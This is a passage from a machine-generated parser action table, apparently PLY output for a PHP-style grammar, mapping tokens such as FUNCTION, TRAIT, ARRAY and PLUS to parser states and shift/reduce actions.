443,33,-88,-54,-108,33,-32,33,33,33,-63,-84,-443,-443,-77,33,-443,33,-52,33,]),'FUNCTION':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,373,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,519,522,523,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,659,662,663,665,666,667,668,669,670,671,672,679,682,693,703,740,741,742,746,748,759,762,763,774,776,777,778,788,803,806,811,813,814,820,822,825,826,832,835,836,841,844,849,853,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,890,893,907,908,909,910,911,912,913,914,915,917,918,930,934,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,34,-3,-2,-4,-5,-6,110,-50,-443,110,110,110,110,110,-47,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-443,110,34,-23,110,-48,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-38,-40,-42,-443,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,110,-8,-443,34,-30,-22,-24,-25,-26,110,-11,-12,110,110,-39,-41,-43,-44,110,-45,-46,110,34,-56,-443,110,110,110,110,110,110,110,110,-7,34,-9,110,110,-28,110,110,110,110,110,110,110,-443,110,-443,-443,-130,110,110,110,110,110,110,-10,-29,-443,-443,110,110,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,-443,-136,-111,-129,784,-154,-155,-159,-163,-164,-165,-166,-160,-161,-162,110,110,110,-27,-443,-62,34,34,110,-51,-55,34,-443,-110,-135,842,-158,110,110,-31,-64,110,-34,110,-85,110,-443,-443,-443,-109,-139,-132,-134,110,-65,-71,110,-36,-83,-443,-443,-92,-93,-86,-87,34,-61,34,34,-138,-141,110,-443,-35,-76,-443,34,-443,34,-88,-54,-108,-133,110,-32,34,34,34,-140,-63,-84,-443,-443,-77,34,-131,-443,-157,34,-52,-137,34,-156,]),'INTERFACE':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,37,-3,-2,-4,-5,-6,-50,-443,-47,-443,37,-23,-48,-38,-40,-42,-443,-8,-443,37,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,37,-56,-7,37,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,37,37,-51,-55,37,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,37,-61,37,37,-443,-35,-76,-443,37,-443,37,-88,-54,-108,-32,37,37,37,-63,-84,-443,-443,-77,37,-443,37,-52,37,]),'TRAIT':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,38,-3,-2,-4,-5,-6,-50,-443,-47,-443,38,-23,-48,-38,-40,-42,-443,-8,-443,38,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,38,-56,-7,38,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,38,38,-51,-55,38,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,38,-61,38,38,-443,-35,-76,-443,38,-443,38,-88,-54,-108,-32,38,38,38,-63,-84,-443,-443,-77,38,-443,38,-52,38,]),'NEW':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,40,-3,-2,-4,-5,-6,40,-50,-443,40,40,40,40,40,-47,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-443,40,40,-23,40,-48,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-38,-40,-42,-443,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,-8,-443,40,-30,-22,-24,-25,-26,40,-11,-12,40,40,-39,-41,-43,-44,40,-45,-46,40,40,-56,40,40,40,40,40,40,40,40,-7,40,-9,40,40,-28,40,40,40,40,40,40,40,-443,40,40,40,40,40,40,40,-10,-29,-443,-443,40,40,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,40,40,40,-27,-443,-62,40,40,40,-51,-55,40,-110,40,40,-31,-64,40,-34,40,-85,40,-443,-443,-443,-109,40,-65,-71,40,-36,-83,-443,-443,-92,-93,-86,-87,40,-61,40,40,40,-443,-35,-76,-443,40,-443,40,-88,-54,-108,40,-32,40,40,40,-63,-84,-443,-443,-77,40,-443,40,-52,40,]),'CLONE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,41,-3,-2,-4,-5,-6,41,-50,-443,41,41,41,41,41,-47,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-443,41,41,-23,41,-48,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-38,-40,-42,-443,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,-8,-443,41,-30,-22,-24,-25,-26,41,-11,-12,41,41,-39,-41,-43,-44,41,-45,-46,41,41,-56,41,41,41,41,41,41,41,41,-7,41,-9,41,41,-28,41,41,41,41,41,41,41,-443,41,41,41,41,41,41,41,-10,-29,-443,-443,41,41,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,41,41,41,-27,-443,-62,41,41,41,-51,-55,41,-110,41,41,-31,-64,41,-34,41,-85,41,-443,-443,-443,-109,41,-65,-71,41,-36,-83,-443,-443,-92,-93,-86,-87,41,-61,41,41,41,-443,-35,-76,-443,41,-443,41,-88,-54,-108,41,-32,41,41,41,-63,-84,-443,-443,-77,41,-443,41,-52,41,]),'LIST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,491,500,501,528,532,533,535,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,751,752,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,42,-3,-2,-4,-5,-6,42,-50,-443,42,42,42,42,42,-47,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,-443,42,42,-23,42,-48,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,-38,-40,-42,-443,42,42,42,42,42,42,42,42,42,42,42,42,42,396,42,42,42,42,42,42,42,42,-8,-443,42,-30,-22,-24,-25,-26,42,-11,-12,42,42,-39,-41,-43,-44,42,-45,-46,42,42,-56,42,42,42,42,42,42,42,42,-7,42,-9,42,42,-28,42,42,42,42,42,42,42,627,-443,42,42,42,396,396,42,42,42,42,-10,-29,-443,-443,42,42,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,42,42,42,-27,-443,-62,42,42,42,627,396,-51,-55,42,-110,42,42,-31,-64,42,-34,42,-85,42,-443,-443,-443,-109,42,-65,-71,42,-36,-83,-443,-443,-92,-93,-86,-87,42,-61,42,42,42,-443,-35,-76,-443,42,-443,42,-88,-54,-108,42,-32,42,42,42,-63,-84,-443,-443,-77,42,-443,42,-52,42,]),'ARRAY':([0,2,3,4,5,6,7,9,10,11,13,15,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,81,114,115,119,120,121,128,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,210,217,218,222,230,244,245,246,251,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,296,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,393,404,407,409,423,424,425,429,432,441,442,443,444,446,449,455,456,457,465,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,517,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,653,656,657,661,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,44,-3,-2,-4,-5,-6,44,-50,117,-443,117,44,44,44,44,44,-47,44,117,44,44,44,44,44,44,117,117,44,44,44,44,44,44,44,44,44,44,44,44,44,44,117,-443,117,44,44,-23,117,44,-48,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,-38,-40,-42,117,117,-443,44,44,44,44,44,44,44,44,44,44,44,44,44,117,117,44,117,117,117,44,44,44,44,44,44,44,-8,-443,44,117,-30,-22,-24,-25,-26,44,-11,467,-12,117,44,44,-39,-41,-43,-44,44,-45,467,-46,44,44,-56,117,117,117,44,44,117,44,44,117,44,117,44,44,44,-7,44,-9,44,44,-28,467,467,467,117,467,44,44,44,44,44,44,44,117,117,-443,44,467,117,117,117,44,44,117,117,117,117,117,44,44,44,44,-10,-29,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,467,117,467,-443,-443,44,44,-33,-70,-443,117,-37,-49,-443,-53,-57,-60,-443,117,467,117,117,-111,117,44,44,44,-27,467,467,-443,-62,44,44,44,117,117,-51,-55,44,467,467,467,-110,117,117,44,44,-31,-64,44,-34,44,-85,44,117,-443,-443,-443,467,-109,467,-443,467,44,-65,-71,44,-36,-83,-443,-443,-92,-93,-86,-87,44,-61,44,44,-443,467,117,-123,44,-443,-35,-76,-443,44,-443,44,-88,-54,-108,467,117,117,467,-122,44,-32,44,44,44,117,-63,-84,-443,-443,-77,44,-443,-126,-128,44,-52,44,-127,]),'LBRACKET':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,214,218,228,234,235,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,294,295,301,302,303,304,305,336,345,346,347,348,350,351,352,354,355,356,359,360,361,375,389,399,404,406,407,413,418,422,423,425,428,429,431,432,437,441,442,443,444,445,446,447,449,455,456,457,468,472,477,479,480,481,482,485,487,488,489,490,500,501,503,525,528,532,549,553,554,556,557,559,560,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,618,620,621,622,628,630,634,636,637,638,639,640,646,657,679,681,682,683,684,685,686,693,695,698,701,702,703,734,735,740,741,742,743,746,748,753,759,762,763,764,771,773,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,855,856,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,900,902,903,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,45,-3,-2,-4,-5,-6,45,-50,-443,45,45,45,45,45,-47,45,205,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,-206,-207,-208,-225,-226,267,-237,-239,-443,45,45,-23,45,-48,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,-38,-40,-42,-443,45,45,45,45,45,45,45,45,45,45,45,45,45,267,45,205,267,205,45,45,45,45,45,45,-227,45,267,-8,-443,45,-30,-22,-24,-25,-26,45,-11,468,-12,-443,-244,-248,45,-250,45,-39,-41,-43,-44,205,45,-45,468,-46,45,205,45,-56,45,45,205,45,205,45,205,-443,550,45,45,-229,45,-230,45,-219,-7,45,-9,45,-209,45,205,-28,468,468,468,468,267,45,45,-221,616,-245,45,45,45,45,45,-443,45,468,-234,45,45,-443,693,205,45,45,45,45,-218,-235,-236,-240,-10,-29,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,468,-443,-443,45,45,-249,-33,-70,-443,205,-37,-49,-443,-53,-57,-60,-443,468,-111,45,205,45,205,205,-205,-223,45,-210,-231,-232,-211,-27,468,468,-443,-62,45,-220,45,45,205,-51,-55,45,468,468,468,-110,-222,-212,-213,45,-214,-215,45,-31,-64,45,-246,-247,-34,45,-85,45,-443,-443,-443,468,-109,468,205,-443,468,45,-65,-71,45,-36,-83,-443,-443,-92,-93,-86,-87,45,-61,45,45,468,-224,-216,-217,45,-443,-35,-76,-443,45,-443,45,-88,-54,-108,468,468,45,-32,45,45,45,-63,-84,-443,-443,-77,45,-443,45,-52,45,]),'PLUS':([0,2,3,4,5,6,7,9,10,12,13,17,19,23,24,25,28,29,32,35,39,41,43,44,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,67,68,69,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,165,166,167,168,169,178,180,181,187,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,245,246,247,248,249,250,251,252,253,259,265,267,268,269,270,271,273,275,276,277,278,279,283,285,286,287,288,289,291,292,294,295,299,300,301,302,303,304,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,342,343,344,345,346,347,348,351,352,354,355,356,360,361,374,375,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,402,404,407,414,415,416,417,418,419,423,425,426,427,428,429,430,431,432,433,434,437,439,440,441,442,443,444,445,446,449,450,452,453,454,455,456,457,458,459,461,462,463,464,467,468,477,478,479,480,481,482,483,484,485,486,487,488,489,490,494,497,500,501,503,511,524,525,527,528,529,530,531,532,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,600,602,606,607,613,614,616,617,618,619,620,621,622,623,625,630,634,636,637,638,639,640,646,657,673,674,675,676,677,679,682,685,686,693,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,734,735,736,737,738,740,741,742,743,745,746,748,759,762,763,764,771,773,776,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,854,856,860,861,862,867,868,869,870,871,873,874,875,876,877,878,881,882,883,884,894,900,902,903,904,905,907,908,909,910,911,912,913,914,915,917,918,919,924,926,928,934,935,936,937,938,940,945,951,954,955,962,963,964,967,972,973,975,],[-443,46,-3,-2,-4,-5,-6,46,-50,-362,-443,142,46,46,46,46,46,-47,46,-429,-180,46,-251,-430,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,-344,46,46,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,142,-190,-443,-429,-430,46,46,-23,46,-48,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,-38,142,-40,142,-42,142,142,-443,142,-370,46,46,46,46,46,46,46,46,46,46,46,46,-323,-324,46,-443,-185,-186,-187,-192,-225,-228,-198,46,142,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,142,46,46,142,142,142,142,46,142,-348,-363,46,46,46,-227,46,-228,-349,-8,-443,46,-364,-428,142,-30,-22,-24,-25,-26,46,-11,455,-12,142,-443,-443,-244,-248,46,-250,142,142,142,142,142,142,142,142,142,-297,-298,-299,-300,-301,142,142,-304,142,142,142,142,142,142,142,142,-313,-314,142,46,142,142,142,142,-39,-41,-43,-44,46,-45,455,-46,46,46,-56,142,46,142,142,142,142,142,142,142,142,142,142,142,-183,46,-197,-188,-253,46,46,142,142,-345,142,-443,-352,46,46,-365,-385,-229,46,-366,-230,46,-357,-358,-219,142,142,-7,46,-9,46,-209,46,-28,142,-429,580,-402,455,455,455,-378,-379,-382,-383,-384,-389,-430,455,46,-184,46,-221,-243,-245,142,-238,46,142,46,46,46,46,142,142,-443,46,455,-353,142,-234,-229,46,-189,-443,-230,46,-252,142,142,-333,-336,-337,-346,-443,142,-361,46,46,142,46,46,142,-218,-235,-236,-240,-10,-29,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,455,-392,-393,580,-380,-390,455,580,-402,-443,-443,46,46,-249,142,-33,-70,-443,142,142,-37,-49,-443,-53,-57,-60,-443,455,-111,-196,142,-191,-194,142,46,46,-205,-223,46,-210,-231,-232,-211,-27,580,580,580,580,580,580,580,580,-411,-412,-413,-414,-415,580,580,-418,580,580,580,580,580,580,580,580,-427,-381,-391,-395,455,455,-365,-366,-386,-443,-62,46,-220,142,46,46,-51,-55,46,455,455,455,-110,-231,-193,-232,142,142,-222,142,-212,-213,46,-214,-215,46,-394,580,-402,580,-31,-64,46,-246,-247,-34,46,-85,46,-443,-443,-443,455,-109,455,-195,-443,455,46,-65,-71,46,-36,-83,-443,142,-443,-92,-93,-86,-87,46,-61,46,46,455,-224,-216,-217,580,142,46,-443,-35,-76,-443,46,-443,46,-88,-54,-108,-271,455,580,455,46,-32,142,46,46,46,580,-63,-84,-443,-443,-77,46,-443,46,-52,46,]),'MINUS':([0,2,3,4,5,6,7,9,10,12,13,17,19,23,24,25,28,29,32,35,39,41,43,44,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,67,68,69,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,165,166,167,168,169,178,180,181,187,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,245,246,247,248,249,250,251,252,253,259,265,267,268,269,270,271,273,275,276,277,278,279,283,285,286,287,288,289,291,292,294,295,299,300,301,302,303,304,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,342,343,344,345,346,347,348,351,352,354,355,356,360,361,374,375,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,402,404,407,414,415,416,417,418,419,423,425,426,427,428,429,430,431,432,433,434,437,439,440,441,442,443,444,445,446,449,450,452,453,454,455,456,457,458,459,461,462,463,464,467,468,477,478,479,480,481,482,483,484,485,486,487,488,489,490,494,497,500,501,503,511,524,525,527,528,529,530,531,532,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,600,602,606,607,613,614,616,617,618,619,620,621,622,623,625,630,634,636,637,638,639,640,646,657,673,674,675,676,677,679,682,685,686,693,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,734,735,736,737,738,740,741,742,743,745,746,748,759,762,763,764,771,773,776,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,854,856,860,861,862,867,868,869,870,871,873,874,875,876,877,878,881,882,883,884,894,900,902,903,904,905,907,908,909,910,911,912,913,914,915,917,918,919,924,926,928,934,935,936,937,938,940,945,951,954,955,962,963,964,967,972,973,975,],[-443,47,-3,-2,-4,-5,-6,47,-50,-362,-443,143,47,47,47,47,47,-47,47,-429,-180,47,-251,-430,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,-344,47,47,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,143,-190,-443,-429,-430,47,47,-23,47,-48,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,-38,143,-40,143,-42,143,143,-443,143,-370,47,47,47,47,47,47,47,47,47,47,47,47,-323,-324,47,-443,-185,-186,-187,-192,-225,-228,-198,47,143,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,143,47,47,143,143,143,143,47,143,-348,-363,47,47,47,-227,47,-228,-349,-8,-443,47,-364,-428,143,-30,-22,-24,-25,-26,47,-11,456,-12,143,-443,-443,-244,-248,47,-250,143,143,143,143,143,143,143,143,143,-297,-298,-299,-300,-301,143,143,-304,143,143,143,143,143,143,143,143,-313,-314,143,47,143,143,143,143,-39,-41,-43,-44,47,-45,456,-46,47,47,-56,143,47,143,143,143,143,143,143,143,143,143,143,143,-183,47,-197,-188,-253,47,47,143,143,-345,143,-443,-352,47,47,-365,-385,-229,47,-366,-230,47,-357,-358,-219,143,143,-7,47,-9,47,-209,47,-28,143,-429,581,-402,456,456,456,-378,-379,-382,-383,-384,-389,-430,456,47,-184,47,-221,-243,-245,143,-238,47,143,47,47,47,47,143,143,-443,47,456,-353,143,-234,-229,47,-189,-443,-230,47,-252,143,143,-333,-336,-337,-346,-443,143,-361,47,47,143,47,47,143,-218,-235,-236,-240,-10,-29,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,-392,-393,581,-380,-390,456,581,-402,-443,-443,47,47,-249,143,-33,-70,-443,143,143,-37,-49,-443,-53,-57,-60,-443,456,-111,-196,143,-191,-194,143,47,47,-205,-223,47,-210,-231,-232,-211,-27,581,581,581,581,581,581,581,581,-411,-412,-413,-414,-415,581,581,-418,581,581,581,581,581,581,581,581,-427,-381,-391,-395,456,456,-365,-366,-386,-443,-62,47,-220,143,47,47,-51,-55,47,456,456,456,-110,-231,-193,-232,143,143,-222,143,-212,-213,47,-214,-215,47,-394,581,-402,581,-31,-64,47,-246,-247,-34,47,-85,47,-443,-443,-443,456,-109,456,-195,-443,456,47,-65,-71,47,-36,-83,-443,143,-443,-92,-93,-86,-87,47,-61,47,47,456,-224,-216,-217,581,143,47,-443,-35,-76,-443,47,-443,47,-88,-54,-108,-271,456,581,456,47,-32,143,47,47,47,581,-63,-84,-443,-443,-77,47,-443,47,-52,47,]),'NOT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,48,-3,-2,-4,-5,-6,48,-50,-443,48,48,48,48,48,-47,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-443,48,48,-23,48,-48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-38,-40,-42,-443,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-8,-443,48,-30,-22,-24,-25,-26,48,-11,-12,48,48,-39,-41,-43,-44,48,-45,-46,48,48,-56,48,48,48,48,48,48,48,48,-7,48,-9,48,48,-28,48,48,48,48,48,48,48,-443,48,48,48,48,48,48,48,-10,-29,-443,-443,48,48,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,48,48,48,-27,-443,-62,48,48,48,-51,-55,48,-110,48,48,-31,-64,48,-34,48,-85,48,-443,-443,-443,-109,48,-65,-71,48,-36,-83,-443,-443,-92,-93,-86,-87,48,-61,48,48,48,-443,-35,-76,-443,48,-443,48,-88,-54,-108,48,-32,48,48,48,-63,-84,-443,-443,-77,48,-443,48,-52,48,]),'BOOLEAN_NOT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,